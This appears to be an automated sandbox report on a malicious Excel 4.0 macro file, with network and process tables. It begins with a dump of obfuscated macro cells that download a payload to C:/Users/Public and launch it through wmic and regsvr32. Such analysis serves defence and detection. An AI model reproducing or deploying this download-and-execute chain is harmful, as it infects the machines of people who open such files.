,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=AC19(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=AA19(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=CALL(AC20,AD20,""JCJ"",AE19,0)",,"=FORMULA.ARRAY(before.1.0.0.sheet!AK20&before.1.0.0.sheet!AK21&before.1.0.0.sheet!AK22&before.1.0.0.sheet!AK23&before.1.0.0.sheet!AK24&before.1.0.0.sheet!AK25&before.1.0.0.sheet!AK26&before.1.0.0.sheet!AK27,AC20)","=FORMULA.ARRAY(before.1.0.0.sheet!AL20&before.1.0.0.sheet!AL21&before.1.0.0.sheet!AL22&before.1.0.0.sheet!AL23&before.1.0.0.sheet!AL24&before.1.0.0.sheet!AL25&before.1.0.0.sheet!AL26&before.1.0.0.sheet!AL27&before.1.0.0.sheet!AL28&before.1.0.0.sheet!AL29&before.1.0.0.sheet!AL30&before.1.0.0.sheet!AL31&be
fore.1.0.0.sheet!AL32&before.1.0.0.sheet!AL33&before.1.0.0.sheet!AL34&before.1.0.0.sheet!AL35,AD20)",C:/Users/Public,/dbhfr.xref,"=FORMULA.ARRAY(""A"",before.1.0.0.sheet!AE20)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=CALL(""UR""&before.1.0.0.sheet!AN21,before.1.0.0.sheet!AO20&before.1.0.0.sheet!AO21&before.1.0.0.sheet!AO22&before.1.0.0.sheet!AO23&before.1.0.0.sheet!AO24&before.1.0.0.sheet!AO25&before.1.0.0.sheet!AO26&before.1.0.0.sheet!AO27&before.1.0.0.sheet!AO28&before.1.0.0.sheet!AO29&before.1.0.0.sheet!AO30&before.1.0.0.sheet!AO31&before.1.0.0.sheet!AO32&before.1.0.0.sheet!AO33&before.1.0.0.sheet!AO34&before.1.0.0.sheet!AO35&before.1.0.0.sheet!AO36&before.1.0.0.sheet!AE20,AI27,0,A99,before.1.0.0.sheet!AE19&before.1.0.0.sheet!AF19,0,0)",,Kernel32,CreateDirectoryA,A,,,,,,K,C,,,U,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=AF28(),,=AD19(),=AG19(),,,=AA17(),,,,e,r,,LMon,R,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,r,e,,,L,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,n,a,,,D,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,e,t,,,o,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,l,e,,,w,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,3,D,,,n,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,JJCCBB,,2,i,,,l,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=EXEC(""wmic.exe ""&"" process call create 'regsvr32 -s 
""&AE19&AF19&""'"")",,,,,,r,,,o,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=HALT(),,,,,,e,,,a,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,c,,,d,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,t,,,T,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,o,,,o,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,r,,,F,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,y,,,i,,,,,,,,,,,,,,,,,,,,,,,
Network Behavior |
---|
Network Port Distribution |
---|
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 7, 2021 02:14:54.822761059 CEST | 64938 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 7, 2021 02:14:54.836316109 CEST | 53 | 64938 | 8.8.8.8 | 192.168.2.3 |
Apr 7, 2021 02:14:55.788259029 CEST | 60152 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 7, 2021 02:14:55.801014900 CEST | 53 | 60152 | 8.8.8.8 | 192.168.2.3 |
Apr 7, 2021 02:15:05.334461927 CEST | 57544 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 7, 2021 02:15:05.351008892 CEST | 53 | 57544 | 8.8.8.8 | 192.168.2.3 |
Apr 7, 2021 02:15:06.919131994 CEST | 55984 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 7, 2021 02:15:06.970834017 CEST | 53 | 55984 | 8.8.8.8 | 192.168.2.3 |
Apr 7, 2021 02:15:07.268354893 CEST | 64185 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 7, 2021 02:15:07.300432920 CEST | 53 | 64185 | 8.8.8.8 | 192.168.2.3 |
Apr 7, 2021 02:15:07.867729902 CEST | 65110 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 7, 2021 02:15:07.883011103 CEST | 53 | 65110 | 8.8.8.8 | 192.168.2.3 |
Apr 7, 2021 02:15:08.279006958 CEST | 64185 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 7, 2021 02:15:08.294044018 CEST | 53 | 64185 | 8.8.8.8 | 192.168.2.3 |
Apr 7, 2021 02:15:09.287517071 CEST | 64185 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 7, 2021 02:15:09.318588018 CEST | 53 | 64185 | 8.8.8.8 | 192.168.2.3 |
Apr 7, 2021 02:15:09.878669024 CEST | 58361 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 7, 2021 02:15:09.900266886 CEST | 53 | 58361 | 8.8.8.8 | 192.168.2.3 |
Apr 7, 2021 02:15:10.039572001 CEST | 63492 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 7, 2021 02:15:10.054943085 CEST | 53 | 63492 | 8.8.8.8 | 192.168.2.3 |
Apr 7, 2021 02:15:11.056658030 CEST | 60831 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 7, 2021 02:15:11.072546005 CEST | 53 | 60831 | 8.8.8.8 | 192.168.2.3 |
Apr 7, 2021 02:15:11.305095911 CEST | 64185 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 7, 2021 02:15:11.318502903 CEST | 53 | 64185 | 8.8.8.8 | 192.168.2.3 |
Apr 7, 2021 02:15:11.822489977 CEST | 60100 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 7, 2021 02:15:11.836613894 CEST | 53 | 60100 | 8.8.8.8 | 192.168.2.3 |
Apr 7, 2021 02:15:12.538116932 CEST | 53195 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 7, 2021 02:15:12.550699949 CEST | 53 | 53195 | 8.8.8.8 | 192.168.2.3 |
Apr 7, 2021 02:15:13.315592051 CEST | 50141 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 7, 2021 02:15:13.328358889 CEST | 53 | 50141 | 8.8.8.8 | 192.168.2.3 |
Apr 7, 2021 02:15:14.567866087 CEST | 53023 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 7, 2021 02:15:14.580437899 CEST | 53 | 53023 | 8.8.8.8 | 192.168.2.3 |
Apr 7, 2021 02:15:15.303731918 CEST | 64185 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 7, 2021 02:15:15.318265915 CEST | 53 | 64185 | 8.8.8.8 | 192.168.2.3 |
Apr 7, 2021 02:15:16.320115089 CEST | 49563 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 7, 2021 02:15:16.332264900 CEST | 53 | 49563 | 8.8.8.8 | 192.168.2.3 |
Apr 7, 2021 02:15:18.314070940 CEST | 51352 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 7, 2021 02:15:18.326477051 CEST | 53 | 51352 | 8.8.8.8 | 192.168.2.3 |
Apr 7, 2021 02:15:19.351952076 CEST | 59349 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 7, 2021 02:15:19.365503073 CEST | 53 | 59349 | 8.8.8.8 | 192.168.2.3 |
Apr 7, 2021 02:15:20.328499079 CEST | 57084 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 7, 2021 02:15:20.341801882 CEST | 53 | 57084 | 8.8.8.8 | 192.168.2.3 |
Apr 7, 2021 02:15:22.822797060 CEST | 58823 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 7, 2021 02:15:22.838080883 CEST | 53 | 58823 | 8.8.8.8 | 192.168.2.3 |
Apr 7, 2021 02:15:23.693190098 CEST | 57568 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 7, 2021 02:15:23.705244064 CEST | 53 | 57568 | 8.8.8.8 | 192.168.2.3 |
Apr 7, 2021 02:15:24.502034903 CEST | 50540 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 7, 2021 02:15:24.516278028 CEST | 53 | 50540 | 8.8.8.8 | 192.168.2.3 |
Apr 7, 2021 02:15:24.548897028 CEST | 54366 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 7, 2021 02:15:24.561378002 CEST | 53 | 54366 | 8.8.8.8 | 192.168.2.3 |
Apr 7, 2021 02:15:27.916296959 CEST | 53034 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 7, 2021 02:15:27.936306000 CEST | 53 | 53034 | 8.8.8.8 | 192.168.2.3 |
Apr 7, 2021 02:15:32.802227974 CEST | 57762 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 7, 2021 02:15:32.827828884 CEST | 53 | 57762 | 8.8.8.8 | 192.168.2.3 |
Apr 7, 2021 02:15:59.458954096 CEST | 55435 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 7, 2021 02:15:59.471766949 CEST | 53 | 55435 | 8.8.8.8 | 192.168.2.3 |
Apr 7, 2021 02:16:02.065057993 CEST | 50713 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 7, 2021 02:16:02.085725069 CEST | 53 | 50713 | 8.8.8.8 | 192.168.2.3 |
Apr 7, 2021 02:16:33.418023109 CEST | 56132 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 7, 2021 02:16:33.434314966 CEST | 53 | 56132 | 8.8.8.8 | 192.168.2.3 |
Apr 7, 2021 02:16:40.256187916 CEST | 58987 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 7, 2021 02:16:40.284255981 CEST | 53 | 58987 | 8.8.8.8 | 192.168.2.3 |
Apr 7, 2021 02:16:40.944395065 CEST | 56579 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 7, 2021 02:16:40.962261915 CEST | 53 | 56579 | 8.8.8.8 | 192.168.2.3 |
Apr 7, 2021 02:17:15.378403902 CEST | 60633 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 7, 2021 02:17:15.390913963 CEST | 53 | 60633 | 8.8.8.8 | 192.168.2.3 |
Apr 7, 2021 02:17:15.587543964 CEST | 61292 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 7, 2021 02:17:15.613966942 CEST | 53 | 61292 | 8.8.8.8 | 192.168.2.3 |
DNS Queries |
---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Apr 7, 2021 02:15:09.878669024 CEST | 192.168.2.3 | 8.8.8.8 | 0x9b18 | Standard query (0) | A (IP address) | IN (0x0001) |
DNS Answers |
---|
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Apr 7, 2021 02:15:09.900266886 CEST | 8.8.8.8 | 192.168.2.3 | 0x9b18 | Name error (3) | none | none | A (IP address) | IN (0x0001) |
Code Manipulations |
---|
Statistics |
---|
CPU Usage |
---|
Memory Usage |
---|
High Level Behavior Distribution |
---|
Behavior |
---|
System Behavior |
---|
General |
---|
Start time: | 02:15:05 |
Start date: | 07/04/2021 |
Path: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x12a0000 |
File size: | 27110184 bytes |
MD5 hash: | 5D6638F2C8F8571C593999C58866007E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 02:15:09 |
Start date: | 07/04/2021 |
Path: | C:\Windows\SysWOW64\wbem\WMIC.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x300000 |
File size: | 391680 bytes |
MD5 hash: | 79A01FCD1C8166C5642F37D1E0FB7BA8 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
General |
---|
Start time: | 02:15:10 |
Start date: | 07/04/2021 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6b2800000 |
File size: | 625664 bytes |
MD5 hash: | EA777DEEA782E8B4D7C7C33BBF8A4496 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 02:15:10 |
Start date: | 07/04/2021 |
Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff79bfa0000 |
File size: | 24064 bytes |
MD5 hash: | D78B75FC68247E8A63ACBA846182740E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Disassembly |
---|
Code Analysis |
---|